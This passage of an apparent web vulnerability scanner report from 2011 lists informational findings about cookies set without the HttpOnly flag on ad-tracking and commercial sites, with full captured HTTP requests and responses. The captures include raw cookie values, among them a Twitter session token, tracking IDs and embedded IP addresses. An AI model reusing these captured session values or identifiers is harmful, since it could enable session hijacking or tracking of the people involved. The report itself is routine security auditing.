Cookie: guest_id=130314166807091166; __utmz=43838368.1303561994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); k=173.193.214.243.1304470443436909; __utma=43838368.551233229.1303561994.1304617828.1304721594.4; __utmc=43838368; __utmb=43838368.1.10.1304721594; _twitter_sess=BAh7CjoMY3NyZl9pZCIlYWE5YTBlZmFmNzAwM2UwZDIwOWRmZDJkOWU1OTMy%250AODc6DnJldHVybl90byIkaHR0cDovL3R3aXR0ZXIuY29tL1NvY2lhbEZvbGxv%250AdzoPY3JlYXRlZF9hdGwrCMPlZMYvASIKZmxhc2hJQzonQWN0aW9uQ29udHJv%250AbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoHaWQiJTgwNGQ4%250AYWRlNDZmOTk5ZWNkOWM4MGEzYzI3MGY5ZjI0--8891229de7e28d860da29be28f8a516671ce98f8

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 17:40:09 GMT
Server: hi
Status: 200 OK
X-Transaction: 1304703609-30473-34243
X-RateLimit-Limit: 1000
ETag: "07cee35ad36c4b6979ad1fda1c8bb051"-gzip
Last-Modified: Fri, 06 May 2011 17:40:09 GMT
X-RateLimit-Remaining: 997
X-Runtime: 0.02318
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114bc137096
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api_phoenix
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: c9c59e83fb5603f4fb8ee0e90708cc03f51ed091
X-RateLimit-Reset: 1304707199
Set-Cookie: original_referer=JbKFAfGwv4RwApvTLqS%2BuSg2nN6n6Sc2FNg%2B%2FJZdApHOHiilCO8gnQ%3D%3D; path=/
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoMY3NyZl9pZCIlYWE5YTBlZmFmNzAwM2UwZDIwOWRmZDJkOWU1OTMy%250AODc6DnJldHVybl90byIkaHR0cDovL3R3aXR0ZXIuY29tL1NvY2lhbEZvbGxv%250AdzoPY3JlYXRlZF9hdGwrCMPlZMYvAToHaWQiJTgwNGQ4YWRlNDZmOTk5ZWNk%250AOWM4MGEzYzI3MGY5ZjI0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpG%250AbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--6bd1977f1842a61d06074014f6ed8747cb8e4463; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Connection: close
Content-Length: 36346

{"statuses":[{"text":"Is it possible that I am feeling socially inadequate?","coordinates":null,"truncated":false,"id_str":"66530188304990208","source":"web","geo":null,"favorited":false,"retweet_coun
...[SNIP]...
18.119. http://as.casalemedia.com/j  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://as.casalemedia.com
Path:   /j

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /j?s=120511&u=&a=5&id=468990195&p=10&v=2&inif=1&l=0&t=0&w=1920&h=1156&z=300 HTTP/1.1
Host: as.casalemedia.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/APM/iview/148848792/direct;;wi.160;hi.600/01?click=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CMD2=AAEoyE2yFpUAAda-AAM1SAEBAAABSX1NshatAAHWvwADMMABAQAAAT5wTbIThAAB1r8AA1CpAQEAAAE8qE2yE6cAAda-AALpswEBAAABTh1NshOxAAHWvwADSxMBAQAAATk1TbH5FgAB1r8AAwS1AQEA; CMD3=AAFJfU2yGXEAAda-AAMwuwEBAAABUcZNshvmAAHWvwADXUQBAQAAAT5wTbITvQAB1r8AA1CnAQEAAAFOHU2yFpUAAda-AANLEQEBAAABPwRNshasAAHWvwAC90IBAQAAAU2CTbIZ7wAB1r8AA0r8AwMAAAFML02x+RYAAda-AAM-FgEBAA**; CMJ2=AAJzHU2y+SIB; CMS=98198&1304076182; CMD1=AAFMcU26n5YAAX+WAANDjAEBAA**; CMID=5w153q3LtckAAEY.ZOUAAAAB; CMPS=061; CMPP=006

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/javascript
Expires: Fri, 06 May 2011 20:28:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 06 May 2011 20:28:10 GMT
Content-Length: 179
Connection: close
Set-Cookie: CMID=5w153q3LtckAAEY.ZOUAAAAB;domain=casalemedia.com;path=/;expires=Sat, 05 May 2012 20:28:10 GMT
Set-Cookie: CMPS=061;domain=casalemedia.com;path=/;expires=Thu, 04 Aug 2011 20:28:10 GMT
Set-Cookie: CMPP=006;domain=casalemedia.com;path=/;expires=Thu, 04 Aug 2011 20:28:10 GMT
Set-Cookie: CMSC=TcRZ2g**;domain=casalemedia.com;path=/;
Set-Cookie: CMD3=AAFJfU3EWdoAAda-AAMwuwECAAABPnBNxFnaAAHWvwADUKcBAgA*;domain=casalemedia.com;path=/;expires=Sun, 05 Jun 2011 20:28:10 GMT

document.write('<iframe src="http://cdn.optmd.com/V2/81520/217255/index.html" width="160" height="600" marginwidth="0" marginheight="0" frameborder="0" scrolling="no"></iframe>');
18.120. http://b.scorecardresearch.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=2&c2=6402952&rn=336110646&c7=http%3A%2F%2Fwww.linkedin.com%2Fpub%2Fsocial-follow%2F12%2F7a2%2F294&c8=Social%20Follow%20%7C%20LinkedIn&c9=http%3A%2F%2Fburp%2Fshow%2F0&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.linkedin.com/pub/social-follow/12/7a2/294
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Fri, 06 May 2011 17:41:20 GMT
Connection: close
Set-Cookie: UID=25894b9d-24.143.206.177-1303083414; expires=Sun, 05-May-2013 17:41:20 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

18.121. http://b.scorecardresearch.com/r  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /r

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r?c2=6035740&d.c=gif&d.o=dedominion&d.x=241937932&d.t=page&d.u=http%3A%2F%2Fdominionenterprises.com%2F HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://dominionenterprises.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Fri, 06 May 2011 18:39:03 GMT
Connection: close
Set-Cookie: UID=25894b9d-24.143.206.177-1303083414; expires=Sun, 05-May-2013 18:39:03 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;
18.122. http://bh.contextweb.com/bh/set.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /bh/set.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bh/set.aspx?action=add&advid=2250&token=EXPD1 HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2588783;type=nausc547;cat=naush134;u=80312807C795402E93C5016D2A2A3E1B;ord=7169916033744.81?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|535461.2931142961646634775.1; C2W4=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ; cwbh1=541%3B05%2F24%2F2011%3BLIFL1%0A1697%3B05%2F24%2F2011%3BFCRT1%0A2354%3B05%2F24%2F2011%3BZETC1%0A2532%3B05%2F26%2F2011%3BAMQU2%0A1443%3B05%2F30%2F2011%3BNETM7; pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|530739.4dab7d35-b1d2-915a-d3c0-9d57f9c66b07.0|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|535461.2931142961646634775.1; cr=2|1|-8588966416881931568|1; V=wOebwAz4UvVv; FC1-WC=^53620_1_2QLwy

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1
CW-Server: cw-web84
Set-Cookie: V=wOebwAz4UvVv; Domain=.contextweb.com; Expires=Mon, 30-Apr-2012 22:33:36 GMT; Path=/
Set-Cookie: cwbh1=541%3B05%2F24%2F2011%3BLIFL1%0A1697%3B05%2F24%2F2011%3BFCRT1%0A2354%3B05%2F24%2F2011%3BZETC1%0A2532%3B05%2F26%2F2011%3BAMQU2%0A1443%3B05%2F30%2F2011%3BNETM7%0A2250%3B06%2F05%2F2011%3BEXPD1; Domain=.contextweb.com; Expires=Sat, 09-Apr-2016 22:33:36 GMT; Path=/
Content-Type: image/gif
Date: Fri, 06 May 2011 22:33:35 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 49

GIF89a...................!.......,...........T..;
18.123. http://cf.addthis.com/red/p.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cf.addthis.com
Path:   /red/p.json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /red/p.json?rb=2&gen=1000&gen=100&sid=4dc4e03312c53e71&callback=_ate.ad.hrr&pub=xa-4aa4857d5e87e10e&uid=4dab4fa85facd099&url=http%3A%2F%2Fwww.clone-systems.com%2Fecommerce%2Fproducts%2FPenetration-Testing-On-Demand.html&ref=http%3A%2F%2Fwww.clone-systems.com%2Fecommerce%2Fcategories%2FPenetration-Testing%2F&v16xwn HTTP/1.1
Host: cf.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh41.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; di=%7B%7D..1304471550.1FE|1304471550.1OD|1304471550.60; dt=X; psc=2; uid=4dab4fa85facd099; uit=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Sat, 07 May 2011 01:17:42 GMT
Set-Cookie: di=1304471550.60|1304471550.1OD|1304471550.1FE; Domain=.addthis.com; Expires=Mon, 06-May-2013 01:17:42 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Mon, 06-Jun-2011 01:17:42 GMT; Path=/
Content-Type: text/javascript
Content-Length: 161
Date: Sat, 07 May 2011 01:17:41 GMT
Connection: close

_ate.ad.hrr({"urls":["http://p.addthis.com/pixel?pixelID=57148&partnerID=115&key=segment"],"segments":["1NE"],"loc":"MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NDAwVg=="});
18.124. http://clk.atdmt.com/AVE/go/173511812AD54EE6ABF0CBB5D825DA4F/direct/01  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clk.atdmt.com
Path:   /AVE/go/173511812AD54EE6ABF0CBB5D825DA4F/direct/01

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /AVE/go/173511812AD54EE6ABF0CBB5D825DA4F/direct/01?_kk=6713825b-9989-43cb-8a7b-5c5635138b40&_kt=6426467207&gclid=CMm21t3V1KgCFcPd4AodU3_CiA HTTP/1.1
Host: clk.atdmt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1303072666-9018543; MUID=B506C07761D7465D924574124E3C14DF; ach00=903d/120af:fb75/120af:e2ff/25d1:d2ca/12b1e:a6ff/1ca6a:e29b/1c5b3:11d81/27298:de5a/4e97; ach01=2a0cb15/120af/57ac7cf/903d/4db39163:b9e90a8/120af/f1fa4b0/fb75/4db416f0:c46edc2/25d1/128fabed/e2ff/4db8a484:cbb7115/12b1e/130edf9b/d2ca/4dbdeda3:7162b37/1ca6a/96559b2/a6ff/4dbeeff6:c6fbf53/1c5b3/1235eb22/e29b/4dbef4f2:ae669bf/27298/ffed956/11d81/4dbef65d:80cc648/4e97/af0b901/de5a/4dbf541a; ANON=A=09C89511BF100DC2E6BE1C66FFFFFFFF&E=b2c&W=1; NAP=V=1.9&E=ad2&C=4Z4hoC0UMdOLFTOoUFdt8MycOkKr26b778UQ7Rv4sDujYgzPjPTdfw&W=1

Response

HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://www.secureworks.com/compliance/comp/pci.html?_kk=6713825b-9989-43cb-8a7b-5c5635138b40&_kt=6426467207&gclid=CMm21t3V1KgCFcPd4AodU3_CiA
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: ach00=903d/120af:fb75/120af:e2ff/25d1:d2ca/12b1e:a6ff/1ca6a:e29b/1c5b3:11d81/27298:de5a/4e97:903d/294e3; expires=Monday, 06-May-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Set-Cookie: ach01=2a0cb15/120af/57ac7cf/903d/4db39163:b9e90a8/120af/f1fa4b0/fb75/4db416f0:c46edc2/25d1/128fabed/e2ff/4db8a484:cbb7115/12b1e/130edf9b/d2ca/4dbdeda3:7162b37/1ca6a/96559b2/a6ff/4dbeeff6:c6fbf53/1c5b3/1235eb22/e29b/4dbef4f2:ae669bf/27298/ffed956/11d81/4dbef65d:80cc648/4e97/af0b901/de5a/4dbf541a:c4717d7/294e3/12504287/903d/4dc49ebc; expires=Monday, 06-May-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Date: Sat, 07 May 2011 01:22:03 GMT
Connection: close

18.125. http://dce.sapha.com/logging.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dce.sapha.com
Path:   /logging.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /logging.php?ac=2546&NS_sw=1920&NS_sh=1200&NS_sc=16&NS_c=yes&NS_pn=&NS_vpn=&NS_uuid=&NS_pt=&NS_ru=&NS_rn=22187&NS_js=1.6&NS_vp=http%3A//tours.sapha.com/%3Fscs_sid%3D2546%26scs_tid%3D25%26scscs%3D1&NS_tz=300&NS_la=&NS_tid=&NS_tamt=&NS_cid= HTTP/1.1
Host: dce.sapha.com
Proxy-Connection: keep-alive
Referer: http://tours.sapha.com/?scs_sid=2546&scs_tid=25&scscs=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sapha_tst_2546=TRUE; sapha_2546_1=62715%7C35764%7C31540%7C2011-04-22+15%3A37%3A56; sapha_tst_1=TRUE; sapha_1_19=110075%7C2676569%7C2668748%7C2011-05-06+16%3A05%3A33

Response

HTTP/1.1 302 Found
Date: Fri, 06 May 2011 22:06:08 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
P3P: CP='NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM'
Cache-Control: private
Set-Cookie: sapha_2546_1=68004%7C40411%7C31540%7C2011-05-06+16%3A06%3A08; expires=Mon, 03-May-2021 22:06:08 GMT; path=/; domain=.sapha.com
Location: http://dce.sapha.com/0.gif
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 0

18.126. http://dce.sapha.com/logging.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dce.sapha.com
Path:   /logging.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /logging.php?ac=1&NS_sw=1920&NS_sh=1200&NS_sc=16&NS_c=yes&NS_pn=&NS_vpn=&NS_uuid=&NS_pt=Lead%20Generation%2C%20Lead%20Capture%20%26%20Website%20Conversion%20Systems%20from%20Sapha&NS_ru=&NS_rn=75869&NS_js=1.6&NS_vp=http%3A//www.sapha.com/&NS_tz=300&NS_la=&NS_tid=&NS_tamt=&NS_cid= HTTP/1.1
Host: dce.sapha.com
Proxy-Connection: keep-alive
Referer: http://www.sapha.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sapha_tst_2546=TRUE; sapha_2546_1=62715%7C35764%7C31540%7C2011-04-22+15%3A37%3A56; sapha_tst_1=TRUE; sapha_1_19=108127%7C2674799%7C2668748%7C2011-04-22+20%3A01%3A46

Response

HTTP/1.1 302 Found
Date: Fri, 06 May 2011 22:05:33 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
P3P: CP='NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM'
Cache-Control: private
Set-Cookie: sapha_1_19=110076%7C2676570%7C2668748%7C2011-05-06+16%3A05%3A33; expires=Mon, 03-May-2021 22:05:33 GMT; path=/; domain=.sapha.com
Location: http://dce.sapha.com/0.gif
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 0

18.127. http://expedia.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://expedia.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Object moved
Date: Fri, 06 May 2011 22:33:30 GMT
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Set-Cookie: p1=`tpid=v.1,1`11; expires=Fri, 6-May-2016 00:00:01 GMT; domain=.expedia.com; path=/
Location: http://www.expedia.com/default.asp
Content-Length: 155
Content-Type: text/html; Charset=iso-8859-1
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://www.expedia.com/default.asp">here</a>.</body>
18.128. http://image.providesupport.com/js/advancedaccess/safe-monitor.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image.providesupport.com
Path:   /js/advancedaccess/safe-monitor.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/advancedaccess/safe-monitor.js?ps_h=dTmJ&ps_t=1304725193847 HTTP/1.1
Host: image.providesupport.com
Proxy-Connection: keep-alive
Referer: http://www.advancedaccess.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NOI CURa ADMa DEVa OUR IND COM NAV", policyref="/w3c/p3p.xml"
Content-Type: application/x-javascript
Cache-Control: must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: vsid=wmi0souExiDc;Path=/;Domain=.providesupport.com
Content-Length: 2851
Date: Fri, 06 May 2011 18:39:55 GMT
Connection: close

var psdTmJsid = "wmi0souExiDc";
// safe-monitor@gecko.js

var psdTmJiso;
try {
   psdTmJiso = (opener != null) && (typeof(opener.name) != "unknown") && (opener.psdTmJwid != null);
} catch(e) {
   psdTmJi
...[SNIP]...
18.129. http://image.providesupport.com/js/charlesw/safe-standard.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image.providesupport.com
Path:   /js/charlesw/safe-standard.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/charlesw/safe-standard.js?ps_h=u2TY&ps_t=1304725192651 HTTP/1.1
Host: image.providesupport.com
Proxy-Connection: keep-alive
Referer: http://www.eneighborhoods.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NOI CURa ADMa DEVa OUR IND COM NAV", policyref="/w3c/p3p.xml"
Content-Type: application/x-javascript
Cache-Control: must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: vsid=Oq0ITgZJuzSN;Path=/;Domain=.providesupport.com
Content-Length: 5069
Date: Fri, 06 May 2011 18:39:54 GMT
Connection: close

var psu2TYsid = "Oq0ITgZJuzSN";
// safe-standard@gecko.js

var psu2TYiso;
try {
   psu2TYiso = (opener != null) && (typeof(opener.name) != "unknown") && (opener.psu2TYwid != null);
} catch(e) {
   psu2TY
...[SNIP]...
18.130. http://int.teracent.net/tase/int  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://int.teracent.net
Path:   /tase/int

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tase/int?adv=206&fmt=redirect&sec=0&bizoid=3004,4024,2002 HTTP/1.1
Host: int.teracent.net
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/subscribe/section/122/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=Mwf8VEP.X2PRIV; imp=a$le#1303349159766_32407932_ap2102_int|150#1303349107011_23701916_as2101_imp|; p150r=b$u-84#5.7Oy|c-t1_3X0PNEA9Ju0#1.7Oy|c-t2_3jnoWyampnx#1.7Oy|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: p206r=b$u-3#5.7VA|c-2002#1.7VA|c-3004#1.7VA|c-4024#1.7VA|; Domain=.teracent.net; Expires=Thu, 03-Nov-2011 01:50:38 GMT; Path=/
Set-Cookie: imp=a$le#1304733038729_111974928_ap2101_int|150#1303349107011_23701916_as2101_imp|; Domain=.teracent.net; Expires=Thu, 03-Nov-2011 01:50:38 GMT; Path=/tase
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43
Date: Sat, 07 May 2011 01:50:38 GMT
Connection: close

GIF89a.............!.......,...........D..;
18.131. http://leadback.advertising.com/adcedge/lb  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://leadback.advertising.com
Path:   /adcedge/lb

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adcedge/lb?site=695501&srvc=1&betr=expediavis_cs=1&betq=10566=417781 HTTP/1.1
Host: leadback.advertising.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2588783;type=nausc547;cat=naush134;u=80312807C795402E93C5016D2A2A3E1B;ord=7169916033744.81?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
